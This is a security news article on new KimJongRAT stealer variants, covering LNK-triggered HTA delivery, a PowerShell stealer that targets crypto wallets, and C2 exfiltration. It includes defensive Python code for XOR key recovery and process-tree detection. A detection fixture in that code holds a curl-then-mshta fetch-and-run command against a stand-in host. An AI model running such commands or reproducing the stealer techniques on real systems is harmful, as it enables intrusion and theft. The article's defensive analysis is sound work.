New KimJongRAT Stealer Leverages Weaponized LNK File to Deploy PowerShell Dropper

A new wave of KimJongRAT stealer variants has been identified, showcasing advanced delivery, persistence, and information theft techniques.

Both PE and PowerShell-based versions were observed, with attack chains initiated via malicious Windows shortcut (LNK) files.

Upon user interaction, these LNK files trigger the download and execution of multi-stage payloads from attacker-controlled content delivery networks (CDNs), leveraging legitimate services to evade detection.

Technical Details of the PE Variant Chain

The PE variant utilizes a staged approach. The attack commences when a victim opens a weaponized .LNK file, which, using Windows utilities such as cmd.exe and curl.exe, downloads a disguised HTML Application (HTA) file from a legitimate CDN provider.

[Figure: Execution-related LNK information]

The HTA file, embedded with obfuscated VBS code, drops three files: a decoy PDF, a text file with payload URLs, and a 64-bit DLL loader.

The loader, named sys.dll, executes further file retrieval using RC4-encrypted payloads specified in the text file, ultimately deploying stealer and orchestrator components (net64.log and main64.log).

These components implement extensive reconnaissance and exfiltration capabilities, including browser data, system information, email and FTP credentials, and files of interest (such as cryptocurrency wallet data).

The orchestrator communicates with the attacker’s command and control (C2) infrastructure, uploading compressed and XOR-encrypted archives of stolen data, and supporting further attacker commands via HTTP POST and GET requests.

Custom encoding and encryption routines obscure both strings and data, complicating analysis and detection.

For instance, API call strings are encoded using a substitution cipher, and exfiltrated archives are XORed prior to network transmission.
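The article states that exfiltrated archives are XORed before upload but gives no key or container format. The following added example (mine, not the malware's or Unit 42's code) shows the analyst-side counterpart: recovering a short repeating XOR key from a captured upload by using the ZIP local-file-header magic as a crib and confirming the guess by parsing the result. It assumes a ZIP container and a key of at most four bytes; both are assumptions, and the capture is constructed in the script.

```python
import io
import zipfile
from typing import List, Optional

ZIP_MAGIC = b"PK\x03\x04"  # local file header signature that begins every ZIP


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def is_valid_zip(data: bytes) -> bool:
    """True only if the bytes parse as a ZIP and every member's CRC checks out."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.testzip() is None
    except Exception:  # BadZipFile or any parse error on garbage input
        return False


def recover_xor_key(blob: bytes, max_key_len: int = 4) -> Optional[bytes]:
    """Crib the ZIP magic against the first bytes. For key length k <= 4 the magic
    fixes the key bytes outright; decoding the whole blob as a ZIP confirms the guess
    and rejects key lengths that only match by coincidence."""
    for k in range(1, max_key_len + 1):
        key = bytes(blob[i] ^ ZIP_MAGIC[i] for i in range(k))
        if is_valid_zip(xor_bytes(blob, key)):
            return key
    return None


def list_stolen_files(blob: bytes) -> List[str]:
    """Member names inside a captured XORed archive, or [] if no key is found."""
    key = recover_xor_key(blob)
    if key is None:
        return []
    with zipfile.ZipFile(io.BytesIO(xor_bytes(blob, key))) as zf:
        return zf.namelist()


def make_sample_capture(key: bytes) -> bytes:
    """Constructed stand-in for a captured upload: a small ZIP of fake loot, XORed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("sysinfo.txt", "hostname=LAB-PC\nuser=analyst\n")
        zf.writestr("wallets/metamask.json", '{"note": "constructed sample"}')
    return xor_bytes(buf.getvalue(), key)


if __name__ == "__main__":
    capture = make_sample_capture(b"\x5a\xc3")
    print(recover_xor_key(capture), list_stolen_files(capture))
```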

PowerShell Variant

The PowerShell variant mirrors the overall execution flow of the PE version but relies on an embedded ZIP archive containing a PowerShell stealer and a VBS persistence script.

[Figure: Malware execution chain of the latest KimJongRAT PE variant]

Upon execution, the dropper opens a decoy PDF, extracts the ZIP archive, and runs the main PowerShell script.

According to the Unit 42 report, this script performs anti-VM checks, establishes persistence via registry keys, and collects exhaustive system and browser data.

Particularly notable in the PowerShell stealer is its focus on cryptocurrency assets. The script parses the directories of popular browsers (Chrome, Edge, Naver Whale, Firefox) to extract credentials, cookies, and sensitive files.

It systematically searches for browser extensions associated with cryptocurrency wallets such as MetaMask, Trust Wallet, TronLink, and others, copying extension data and configuration files for exfiltration.

All harvested content is compressed and uploaded to the attacker’s C2 using chunked HTTP POSTs.

The persistent VBS script ensures the stealer is automatically executed at user logon, maintaining continuous access for the threat actor.

The backdoor component of the PowerShell variant facilitates subsequent data theft and remote command execution, supporting both file uploads and downloads, additional malware deployment, and interactive command execution.

Since it was first described in 2013, KimJongRAT has continued to adapt in order to evade defenses and maximize payload impact.

Its multi-file, multi-stage structure, blending native Windows tools, obfuscated scripts, and legitimate Internet services, presents detection and response challenges.

The enhanced focus on cryptocurrency theft signals alignment with broader cybercriminal monetization trends.

Security vendors, including Palo Alto Networks, have updated detection logic to track these evolving threats.

Protection strategies recommended include advanced behavioral monitoring, URL and DNS filtering, and regular incident response exercises.

Organizations should remain vigilant for unusual LNK file activity and unknown outbound connections to suspicious CDNs or dynamic DNS services.
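The delivery chain described in the PE section (LNK opened from Explorer, cmd.exe invoking curl.exe to fetch an HTA from a CDN, then mshta running it) is a process-tree shape a defender can hunt for. The following added example (mine, not from the article or Unit 42) walks constructed Sysmon-style process-creation records and flags curl.exe or mshta.exe launched by cmd.exe whose own parent is explorer.exe; the hosts, paths and URLs in the records are hypothetical.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records in a simplified Sysmon Event ID 1 shape.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "3000", "ppid": "900", "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": "4120", "ppid": "3000", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl.exe -o %TEMP%\doc.hta https://cdn.example.invalid/abc/doc.hta & mshta %TEMP%\doc.hta"},
    {"pid": "4130", "ppid": "4120", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\u\AppData\Local\Temp\doc.hta https://cdn.example.invalid/abc/doc.hta"},
    {"pid": "4140", "ppid": "4120", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Users\u\AppData\Local\Temp\doc.hta"},
    # Benign control: curl run from a developer's terminal must not match.
    {"pid": "5000", "ppid": "900", "image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe", "cmdline": "wt.exe"},
    {"pid": "5010", "ppid": "5000", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": "5020", "ppid": "5010", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://api.example.invalid/health"},
]

LOLBIN_CHILDREN = {"curl.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"'&]+", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_lnk_delivery_chains(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str], bool]]:
    """Return (child_pid, child_image, urls, mentions_hta) for every curl/mshta process whose
    parent is cmd.exe and whose grandparent is explorer.exe, the tree a double-clicked
    shortcut produces. A cmd.exe the user opened from the desktop would match too, so the
    URL and .hta evidence carried in the tuple is what an analyst triages on."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) not in LOLBIN_CHILDREN:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) != "cmd.exe":
            continue
        grand = by_pid.get(parent["ppid"])
        if grand is None or basename(grand["image"]) != "explorer.exe":
            continue
        evidence = parent["cmdline"] + " " + e["cmdline"]
        urls = sorted(set(URL_RE.findall(evidence)))
        hits.append((e["pid"], basename(e["image"]), urls, ".hta" in evidence.lower()))
    return hits


if __name__ == "__main__":
    for hit in find_lnk_delivery_chains(SAMPLE_EVENTS):
        print(hit)
```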

Indicators of Compromise (IOCs)



Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
